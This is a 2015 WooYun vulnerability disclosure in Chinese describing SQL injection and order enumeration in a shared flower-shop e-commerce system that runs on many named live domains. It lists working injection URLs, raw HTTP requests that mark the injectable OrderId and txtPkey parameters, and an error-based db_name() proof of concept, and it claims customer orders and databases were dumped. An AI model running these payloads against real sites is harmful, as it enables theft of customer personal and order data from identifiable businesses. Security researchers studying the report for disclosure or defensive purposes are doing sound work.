当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0134739

漏洞标题:1314鲜花连锁店sql注入漏洞

相关厂商:1314鲜花连锁店

漏洞作者: 路人甲

提交时间:2015-08-18 10:12

修复时间:2015-10-02 10:14

公开时间:2015-10-02 10:14

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-08-18: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-10-02: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

某鲜花连锁通用系统漏洞打包,大量连锁店信息全部泄露!!!涉及上百个网站均由相同问题!!

详细说明:

某鲜花连锁的通用系统,为什么是通用?因为这不是一个网站,这是一群网站,只要使用这套系统的均有问题~~~
说上百个站点一点都不夸张,可以在注入的DBS里面看到域名~~~
PS:不要说这是一个网站,虽然长得像!但是通过注入出的数据就可以判断,所有的数据都是不一样的!!!!先给个PING图后面会用注入证明!!
-----------------------------------------------------------------------

1.JPG


------------------

包括
1314鲜花站:
http://www.1314hua.cn/
香里香http://www.xianglixiang1314.com/
永爱鲜花
http://www.1314ya.com/
其他分站:
cd.1314hua.cn
cq.1314hua.cn
bj.1314hua.cn
sz.1314hua.cn
sz.1314hua.cn
cs.1314hua.cn
ty.xianglixiang1314.com
dg.xianglixiang1314.com
site:xianglixiang1314.com以下……太多了
等等等等


大量连锁店信息全部泄露,几百个裤子!
1.订单遍历
2.SQL注入1
3.sqL注入2
4.SQL注入3


=======================================================
1.订单遍历
我们用1314话做案例
首先我们利用如下URL返回一个ID:

http://www.1314hua.cn/UserCenter_OrderListRecent.aspx?OrderId=1%27%20or%20OrderId%3E%272013


没错你看到的是这样的,,2013年开始就有订单了啊………………我去:

2.JPG


之后我们得到1.订单2013121000054434
没错你猜对了,下一个URL就是
http://www.1314hua.cn/UserCenter_OrderListRecent.aspx?OrderId=1' or OrderId>'2013121000054434


于是我们就

OrderId>'当前订单号

可以得到了所有的订单~~·

3.JPG


==========================================================
SQL注入两枚:
第1处:
参数:OrderId

GET /UserCenter_OrderListRecent.aspx?OrderId=2013121000054434 HTTP/1.1
Host: www.1314hua.cn
Proxy-Connection: keep-alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.130 Safari/537.36
Accept-Encoding: gzip, deflate, sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: ASP.NET_SessionId=vizknr45zo2vmf555h5dao45; news=%u706B%u5C71%u5C9B^upload/20120314214115.jpg^%u96F6%u552E%u4EF7%uFF1A%uFFE5184%u5143^/ProDetail.aspx%3Fid%3D454$|; Hm_lvt_590fe217aa392c8e728535dadc44f394=1439690827; Hm_lpvt_590fe217aa392c8e728535dadc44f394=1439691394; CCKF_INPAGE_CHAT_WIN=MIN


第二处:
http://www.1314hua.cn/UserCenter_OrderListRecent.aspx
注入参数:
txtPkey

POST /UserCenter_OrderListRecent.aspx HTTP/1.1
Host: www.1314hua.cn
Proxy-Connection: keep-alive
Content-Length: 1586
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://www.1314hua.cn
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.130 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://www.1314hua.cn/UserCenter_OrderListRecent.aspx
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: ASP.NET_SessionId=vizknr45zo2vmf555h5dao45; news=%u706B%u5C71%u5C9B^upload/20120314214115.jpg^%u96F6%u552E%u4EF7%uFF1A%uFFE5184%u5143^/ProDetail.aspx%3Fid%3D454$|; Hm_lvt_590fe217aa392c8e728535dadc44f394=1439690827; Hm_lpvt_590fe217aa392c8e728535dadc44f394=1439691563; CCKF_INPAGE_CHAT_WIN=MIN
__VIEWSTATE=%2FwEPDwUKMjAzMzU2OTIxMQ9kFgQCAQ9kFgQCAQ8WAh4HY29udGVudAVi5Lit5Zu95LyY56eA55qE6bKc6Iqx6YWN6YCB5ZWG77yM5rOo6YeN5pyN5Yqh5LiO6LSo6YeP77yMMTDlpJrlubTnmoTlk4HniYzogIHlupfvvIzkv6Hoqonkv53or4HjgIJkAgIPFgIfAAWSATEzMTTov57plIHoirHlupfkuK3lm73mnIDkuJPkuJrnmoTpspzoirHpgJ%2FpgJLmnI3liqHllYYsMTMxNOmynOiKsei%2FnumUgeW6lywxMzE06bKc6Iqx5bqX77yMMTMxNOiKseW6l%2B%2B8jDEzMTTlk4HniYzoirHlupfvvIwxMzE05ZOB54mM6L%2Be6ZSB6Iqx5bqXZAIDD2QWCAIJDw9kFgIeB29uY2xpY2sFEnJldHVybiBjaGVja051bGwoKWQCCw8PFgIeB1Zpc2libGVoZBYGAgEPPCsACwEADxYIHgtfIUl0ZW1Db3VudAIBHghEYXRhS2V5cxYAHglQYWdlQ291bnQCAR4VXyFEYXRhU291cmNlSXRlbUNvdW50AgFkFgJmD2QWAgICD2QWDmYPZBYCZg8VARAyMDE1MDgxNjEwMDcyMzIwZAIBD2QWAmYPFQEQMjAxNS0wOC0xNiAxMDowN2QCAg9kFgJmDxUBBHRlc3RkAgMPZBYCZg8VASI8Zm9udCBjb2xvcj0ncmVkJz7mnKrnoa7orqQ8L2ZvbnQ%2BZAIED2QWAmYPFQF85pyq5LuY5qy%2BIDxhIGhyZWY9J1VzZXJDZW50ZXJQYXkuYXNweD9PcmRlcklkPTIwMTUwODE2MTAwNzIzMjAnIHRhcmdldD0nX2JsYW5rJz48Zm9udCBjb2xvcj0ncmVkJz7nq4vljbPku5jmrL4gPj48L2ZvbnQ%2BPC9hPmQCBQ9kFgJmDxUBDOe9keS4iuaUr%2BS7mGQCBg9kFgJmDxUBEDIwMTUwODE2MTAwNzIzMjBkAgsPDxYCHgRUZXh0BQnnrKwgMSDpobVkZAINDw8WAh8HBQzmgLvlhbEgMSDpobVkZAINDw8WAh8CZ2QWDGYPDxYCHwcFEDIwMTMxMjEwMDAwNTQ0MzRkZAIBDw8WAh8HBRAyMDEzLTEyLTEwIDAwOjA1ZGQCAg8PFgIfBwUG6a2P5pumZGQCAw8PFgIfBwUiPGZvbnQgY29sb3I9J3JlZCc%2B5bey5pS26LSnPC9mb250PmRkAgQPDxYCHwcFCeW3suS7mOasvmRkAgUPDxYCHwcFDOe9keS4iuaUr%2BS7mGRkAg8PDxYCHwJoZGRkrJ0JEzJOQ2oT0scaoWXPQNH1Uf4%3D&__EVENTVALIDATION=%2FwEWAwLihJHcDQLS34SyCwKs34rGBohkJPBPeyM%2BlNOFw4x6Fihij562&SeachKeyWord=%E8%BE%93%E5%85%A5%E5%85%B3%E9%94%AE%E8%AF%8D&txtPkey=1*&button1=%E6%9F%A5%E8%AF%A2


我们来看看~~~

4.JPG


另一个网站也一样~

5.JPG


6.JPG


7.JPG


为毛这么多表……?哦!!!原来如此

8.JPG


另一个网站http://www.xianglixiang1314.com/注入结果如下:与上面的裤子并没有交集,可以证明是一套通用系统!!
POC:

http://www.xianglixiang1314.com/UserCenter_OrderListRecent.aspx?OrderId=2013072222275025%27+%20(select%20convert(int,db_name())%20FROM%20syscolumns)%20--


9.JPG


这里也有几十个网站!!!

10.JPG


====================================
注入点3,用其他网站演示:

http://cd.1314hua.cn/OrderSearch.aspx


11.JPG

漏洞证明:

都在上面

修复方案:

过滤

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝